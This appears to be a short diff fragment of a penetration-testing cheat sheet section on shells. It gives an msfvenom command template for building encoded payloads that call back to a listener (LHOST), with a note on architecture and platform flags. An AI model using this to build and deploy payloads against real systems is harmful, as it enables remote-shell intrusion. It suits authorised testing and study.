Shells

 msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>

-to specify the architecture or the --platform
+One can also use the -a to specify the architecture or the --platform

 WINDOWS